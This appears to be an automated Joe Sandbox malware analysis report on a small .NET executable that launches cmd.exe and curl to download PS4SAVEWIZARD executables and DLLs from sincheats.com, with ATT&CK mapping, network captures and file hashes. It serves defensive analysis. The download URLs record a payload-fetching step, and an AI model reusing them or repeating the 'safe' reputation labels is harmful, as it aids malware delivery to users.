Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.16.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Virtualization/Sandbox Evasion1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery22SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 553495 Sample: j82lgS5kgk Startdate: 15/01/2022 Architecture: WINDOWS Score: 48 32 Multi AV Scanner detection for submitted file 2->32 7 j82lgS5kgk.exe 3 2->7         started        process3 process4 9 cmd.exe 1 7->9         started        11 cmd.exe 1 7->11         started        13 cmd.exe 1 7->13         started        15 dw20.exe 20 6 7->15         started        process5 17 curl.exe 1 9->17         started        20 conhost.exe 9->20         started        22 curl.exe 1 11->22         started        24 conhost.exe 11->24         started        26 curl.exe 1 13->26         started        28 conhost.exe 13->28         started        dnsIp6 30 sincheats.com 217.21.76.148, 443, 49762, 49763 IPPLANET-ASIL United Kingdom 17->30

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
j82lgS5kgk.exe13%VirustotalBrowse
j82lgS5kgk.exe16%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
sincheats.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://sincheats.com/gas/PS4SAVEWIZARD.dll0%Avira URL Cloudsafe
https://sincheats.com/gas/PS4SAVEWIZARD.exeKH0%Avira URL Cloudsafe
https://sincheats.com/gas/PS4SAVEWIZARD.exe0%Avira URL Cloudsafe
https://sincheats.com/gas/PS4SAVEWIZARD.dllWhttps://sincheats.com/gas/PS4SAVEWIZARD.exe0%Avira URL Cloudsafe
https://sincheats.com/gas/PS4SAVEWIZARD.dll30%Avira URL Cloudsafe
https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest0%Avira URL Cloudsafe
https://sincheats.com/gas/PS4SAVEWIZARD.dll-oC:0%Avira URL Cloudsafe
https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest-oC:0%Avira URL Cloudsafe
https://sincheats.com/gas/PS4SAVEWIZARD.dllurlrc0%Avira URL Cloudsafe
https://sincheats.com/gas/PS4SAVEWIZARD.exe-oC:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sincheats.com
217.21.76.148
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://sincheats.com/gas/PS4SAVEWIZARD.dllcurl.exe, 00000009.00000002.660572235.0000024B80CC0000.00000004.00000020.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://sincheats.com/gas/PS4SAVEWIZARD.exeKHcurl.exe, 0000000F.00000003.670298105.00000173F342F000.00000004.00000001.sdmp, curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://sincheats.com/gas/PS4SAVEWIZARD.execurl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://upx.sf.netAmcache.hve.16.drfalse
    high
    https://sincheats.com/gas/PS4SAVEWIZARD.dllWhttps://sincheats.com/gas/PS4SAVEWIZARD.exej82lgS5kgk.exefalse
    • Avira URL Cloud: safe
    unknown
    https://sincheats.com/gas/PS4SAVEWIZARD.dll3curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifestcurl.exe, 00000005.00000002.655444485.0000019DEBA60000.00000004.00000020.sdmp, curl.exe, 00000005.00000002.655463286.0000019DEBA72000.00000004.00000001.sdmp, curl.exe, 00000005.00000003.655221999.0000019DEBA70000.00000004.00000001.sdmp, j82lgS5kgk.exefalse
    • Avira URL Cloud: safe
    unknown
    https://sincheats.com/gas/PS4SAVEWIZARD.dll-oC:cmd.exe, 00000007.00000002.661556157.000001DCDAA60000.00000004.00000040.sdmp, curl.exe, 00000009.00000002.660572235.0000024B80CC0000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest-oC:cmd.exe, 00000001.00000002.656320836.00000254AB400000.00000004.00000040.sdmp, curl.exe, 00000005.00000002.655444485.0000019DEBA60000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://sincheats.com/gas/PS4SAVEWIZARD.dllurlrccurl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://sincheats.com/gas/PS4SAVEWIZARD.exe-oC:cmd.exe, 0000000C.00000002.671799816.000001A5F02C0000.00000004.00000040.sdmp, curl.exe, 0000000F.00000002.670533583.00000173F3420000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    217.21.76.148
    sincheats.comUnited Kingdom
    12491IPPLANET-ASILfalse

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:553495
    Start date:15.01.2022
    Start time:02:46:15
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 10s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:j82lgS5kgk (renamed file extension from none to exe)
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:28
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal48.winEXE@18/7@3/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 4
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.168.117.173
    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdeus16.eastus.cloudapp.azure.com, go.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, settings-win.data.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
    • Execution Graph export aborted for target j82lgS5kgk.exe, PID 7104 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    02:47:19API Interceptor1x Sleep call for process: dw20.exe modified

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    sincheats.comprkVkqYIwv.exeGet hashmaliciousBrowse
    • 217.21.76.148

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    IPPLANET-ASILBL COPY- CIF LCL SEA SHIPMENT.exeGet hashmaliciousBrowse
    • 217.21.74.216
    lGf9WUKTsgGet hashmaliciousBrowse
    • 62.56.233.224
    phantom.x86Get hashmaliciousBrowse
    • 81.199.114.104
    DHL Shipment Details_pdf.exeGet hashmaliciousBrowse
    • 217.21.74.244
    YQEPdzYVKOGet hashmaliciousBrowse
    • 81.199.32.47
    Purchase#Order#39449.pdf.exeGet hashmaliciousBrowse
    • 217.21.76.175
    ijP6DiV44CGet hashmaliciousBrowse
    • 81.199.196.64
    SvmxfeZM5ZGet hashmaliciousBrowse
    • 207.226.57.225
    .exeGet hashmaliciousBrowse
    • 81.199.84.139
    6messag.exeGet hashmaliciousBrowse
    • 81.199.84.139
    .exeGet hashmaliciousBrowse
    • 81.199.84.139
    21.html .exeGet hashmaliciousBrowse
    • 81.199.84.139
    26Message.exeGet hashmaliciousBrowse
    • 81.199.84.139

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_j82lgs5kgk.exe_d42a328ddfe8a7f19158220e406261856f9152_00000000_147602d8\Report.wer
    Process:C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
    Category:dropped
    Size (bytes):65536
    Entropy (8bit):0.8718637770762444
    Encrypted:false
    SSDEEP:96:QiuFMSjcjIr6vpFYQKUWFxF/xpXIa+L+BHUHZ0ownOgFkEwk6aOEXCkOy9n9BncM:eWMgpveDXa1sh9SZsco/u7ssS274lt
    MD5:61F95BB657582C0C87DD1741E40B4228
    SHA1:6FCA398E6ACC8B68B2FA4524B40611714EB7989E
    SHA-256:C609F98C54EA62BC52B50AA0B45635D7F72C8A5EA94531D5CC87D5CF2038C4C5
    SHA-512:44CE9DB644B365DB6A5D0B9349A58F6BA62AC3E58FA88B338222FB4E180102266E2D90789F56633C48A591F4942A5C86F39B8BB3435BB8C2218266DC136DD236
    Malicious:false
    Reputation:low
    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.8.4.8.3.5.9.0.6.9.8.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.8.4.8.3.8.2.0.3.8.6.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.7.c.9.1.8.e.-.3.5.5.2.-.4.5.3.c.-.a.4.7.5.-.c.6.4.1.c.2.9.a.a.0.0.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.i.n.d.o.w.s.F.o.r.m.s.A.p.p.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.0.-.0.0.0.1.-.0.0.1.b.-.5.a.2.6.-.f.c.c.b.b.1.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.c.b.d.4.1.e.c.9.4.5.4.f.6.8.b.8.8.a.7.b.f.7.b.5.8.0.3.4.e.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.4.a.f.f.6.4.b.b.1.f.0.f.e.e.5.d.5.c.4.7.c.5.f.1.2.7.5.3.5.1.c.7.5.8.b.4.2.3.a.!.j.8.2.l.g.S.5.k.g.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.8.7././.1.1././.2.6.:.2.1.:.4.6.:.3.2.!.0.!.j.8.2.l.g.S.5.k.g.k...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.
    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF404.tmp.WERInternalMetadata.xml
    Process:C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
    Category:dropped
    Size (bytes):8084
    Entropy (8bit):3.7054122020031808
    Encrypted:false
    SSDEEP:192:Rrl7r3GLNi0a2C6Yr0/ccWuggmfZ3VS8+p14ldfPCom:RrlsNigC6Y4Upuggmf7SR4/fPM
    MD5:B49FEC417E935F8CB3D6E1F15C12FD96
    SHA1:90A8E6352B4615B852CF2562E2B0048118744539
    SHA-256:83E9B42756E298CDF343EC7570B3A2829014444520EA92412C9173597170CB17
    SHA-512:5A8E4C1A7936F36AA657EE2EC7F3FFE35AA7F715AF20C7CC4B75F57053D73E2A87C8D9F75799939DE0530F149F6BD162419E9D8D425023659CE8EE2F597B9665
    Malicious:false
    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.4.<./.P.i.d.>.......
    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5BA.tmp.xml
    Process:C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):4737
    Entropy (8bit):4.459576083713517
    Encrypted:false
    SSDEEP:48:cvIwSD8zs+6JgtBI91hWSC8BS8fm8M4JFKv8O7Fayq8v88OaHPbfm6Yud:uITf+ILwSNJJFKk9WtLDfm6Yud
    MD5:1CF550749C08291DDC331B921B076A9F
    SHA1:C6CD8BBE4C9FAD7770E6C82BCCC4458C3B0501E9
    SHA-256:5A4F59C9C654968A1B9229D47646583853359C9AC9A479E10337450E5374B7AA
    SHA-512:EF2944C49DA64C107B82BCCFEF5C336FE1423F6210D702744B465F2861CD45996C5D7B9142A0A6DC9BB0A53DB081235165CEDEF6C084718DF8A8A9171BA820E9
    Malicious:false
    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342737" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
    C:\Windows\appcompat\Programs\Amcache.hve
    Process:C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    File Type:MS Windows registry file, NT/2000 or above
    Category:dropped
    Size (bytes):1572864
    Entropy (8bit):4.2405687728898345
    Encrypted:false
    SSDEEP:12288:/aT0Th31T9p6LTSPkr93/h0t+Adgn22e8wEQZs64Jtsw2C/y2:ST0Th31T9p6TSPuA+
    MD5:B506DFB53286441D7228A98ED1D6AC20
    SHA1:1A6C0DD153E2FC7E5A9C5C10460D93CF04A5DF1A
    SHA-256:B112C8DA56D3B41338F478816B65AB481655191B2920D2E1EC4B6A81BC408ED0
    SHA-512:50E935AE234C4CAD686E9C027B8476CC3EFC420DE54E2E96A57EE7EAC3CB13CA9D3456577CFB6E6B44D311D5ED531BB713D129D540FFE525B7D33E151D2C6590
    Malicious:false
    Preview: regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.D.................................................................................................................................................................................................................................................................................................................................................s..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    \Device\ConDrv
    Process:C:\Windows\System32\curl.exe
    File Type:ASCII text, with CR, LF line terminators
    Category:dropped
    Size (bytes):397
    Entropy (8bit):3.562255676265714
    Encrypted:false
    SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcYh3/ARpSgKidDn:Vz6ykymUexb1U9cL9cYV/A2gKi5
    MD5:3416B8B3B50961708FE42E8DB41771F3
    SHA1:9C459936EEC8AFC3F30363FA05705A1976F5184F
    SHA-256:BA13668D045F544CA111EA563307CEEDD1C96A0B35C51EE6175BA9F784A3BB68
    SHA-512:18C80392DE28080329D56C8990BF6E3CC484223DF39E97E53D64EA57284696DB3139EFC3D236935E421B7EBB324618982D5E26C4F32FB860482031C882878D1E
    Malicious:false
    Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0..curl: (35) schannel: failed to receive handshake, SSL/TLS connection failed..

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Entropy (8bit):5.1180088729926165
    TrID:
    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    • Win32 Executable (generic) a (10002005/4) 49.78%
    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
    • Generic Win/DOS Executable (2004/3) 0.01%
    • DOS Executable Generic (2002/1) 0.01%
    File name:j82lgS5kgk.exe
    File size:10752
    MD5:ae6cdc2be9207880528e784fc54501ed
    SHA1:b4aff64bb1f0fee5d5c47c5f1275351c758b423a
    SHA256:e71a997a58a54db0a879969fa1c3de5193b090bc59f3468f408785dbc0d9c7ac
    SHA512:d610b732e7cd0442cfac93b83dda3f9f59a627af5e733e5b0ea795b3fdcf6d19c18656f8bdbe78ff1cf87fe2d0c00eb3e2a8cd37bf11954bec4dcd9b7eb00094
    SSDEEP:192:aLgToiTL+bi7LELaNqLiLyjFvjUTl0d8stYcFwVc03KY:aLgToiTL+bCLELaNqLiLsvwTl0dptYcX
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............3... ...@....@.. ....................................@................................

    File Icon

    Icon Hash:00828e8e8686b000

    Static PE Info

    General

    Entrypoint:0x403396
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Time Stamp:0xDDC5B4B8 [Wed Nov 26 21:46:32 2087 UTC]
    TLS Callbacks:
    CLR (.Net) Version:v2.0.50727
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

    Entrypoint Preview

    Instruction
    jmp dword ptr [00402000h]
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x33420x4f.text
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x1154.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0x32940x38.text
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x20000x139c0x1400False0.4833984375data5.30968855528IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .rsrc0x40000x11540x1200False0.372829861111data4.9705878165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc0x60000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    RT_VERSION0x40900x35cdata
    RT_MANIFEST0x43fc0xd53XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

    Imports

    DLLImport
    mscoree.dll_CorExeMain

    Version Infos

    DescriptionData
    Translation0x0000 0x04b0
    LegalCopyrightCopyright 2022
    Assembly Version1.0.0.0
    InternalNameWindowsFormsApp9.exe
    FileVersion1.0.0.0
    CompanyName
    LegalTrademarks
    Comments
    ProductNameWindowsFormsApp9
    ProductVersion1.0.0.0
    FileDescriptionWindowsFormsApp9
    OriginalFilenameWindowsFormsApp9.exe

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Jan 15, 2022 02:47:07.397722006 CET49762443192.168.2.4217.21.76.148
    Jan 15, 2022 02:47:07.397770882 CET44349762217.21.76.148192.168.2.4
    Jan 15, 2022 02:47:07.397882938 CET49762443192.168.2.4217.21.76.148
    Jan 15, 2022 02:47:07.414597034 CET49762443192.168.2.4217.21.76.148
    Jan 15, 2022 02:47:07.414630890 CET44349762217.21.76.148192.168.2.4
    Jan 15, 2022 02:47:07.575292110 CET44349762217.21.76.148192.168.2.4
    Jan 15, 2022 02:47:09.794965982 CET49763443192.168.2.4217.21.76.148
    Jan 15, 2022 02:47:09.795017004 CET44349763217.21.76.148192.168.2.4
    Jan 15, 2022 02:47:09.795111895 CET49763443192.168.2.4217.21.76.148
    Jan 15, 2022 02:47:09.832969904 CET49763443192.168.2.4217.21.76.148
    Jan 15, 2022 02:47:09.833005905 CET44349763217.21.76.148192.168.2.4
    Jan 15, 2022 02:47:09.993721008 CET44349763217.21.76.148192.168.2.4
    Jan 15, 2022 02:47:14.368269920 CET49766443192.168.2.4217.21.76.148
    Jan 15, 2022 02:47:14.368328094 CET44349766217.21.76.148192.168.2.4
    Jan 15, 2022 02:47:14.368438959 CET49766443192.168.2.4217.21.76.148
    Jan 15, 2022 02:47:14.392884970 CET49766443192.168.2.4217.21.76.148
    Jan 15, 2022 02:47:14.392939091 CET44349766217.21.76.148192.168.2.4
    Jan 15, 2022 02:47:14.553738117 CET44349766217.21.76.148192.168.2.4

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Jan 15, 2022 02:47:07.352165937 CET6464653192.168.2.48.8.8.8
    Jan 15, 2022 02:47:07.382304907 CET53646468.8.8.8192.168.2.4
